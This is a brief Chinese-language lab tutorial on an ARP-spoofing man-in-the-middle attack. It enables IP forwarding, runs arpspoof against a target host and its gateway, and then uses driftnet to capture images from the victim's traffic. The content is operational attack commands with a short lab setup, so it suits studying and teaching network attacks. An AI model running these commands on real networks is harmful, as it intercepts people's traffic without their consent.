实验环境

所用工具：arpspoof && driftnet

攻击机：192.168.0.101

靶机：192.168.0.106

网关：192.168.0.1 【默认网关】

条件：确保处于同一网段

实验步骤

一、 开启流量转发

查看开启状态：cat /proc/sys/net/ipv4/ip_forward 0为关闭1为开启

临时开启：echo 1 > /proc/sys/net/ipv4/ip_forward

永久开启：vim /etc/sysctl.conf ——>>net.ipv4.ip_forward=1 去掉注释

二、 劫持目标 流量欺骗至攻击机

arpspoof -i eth0 -t 192.168.0.1 192.168.0.106

注释：

-i 指定网卡

-t 网关

192.168.0.106 靶机/监控目标

三、打开新的终端执行命令

driftnet -i eth0

四、 实验效果

kali2020需要安装arpsoof才可以使用：

apt-get install dsniff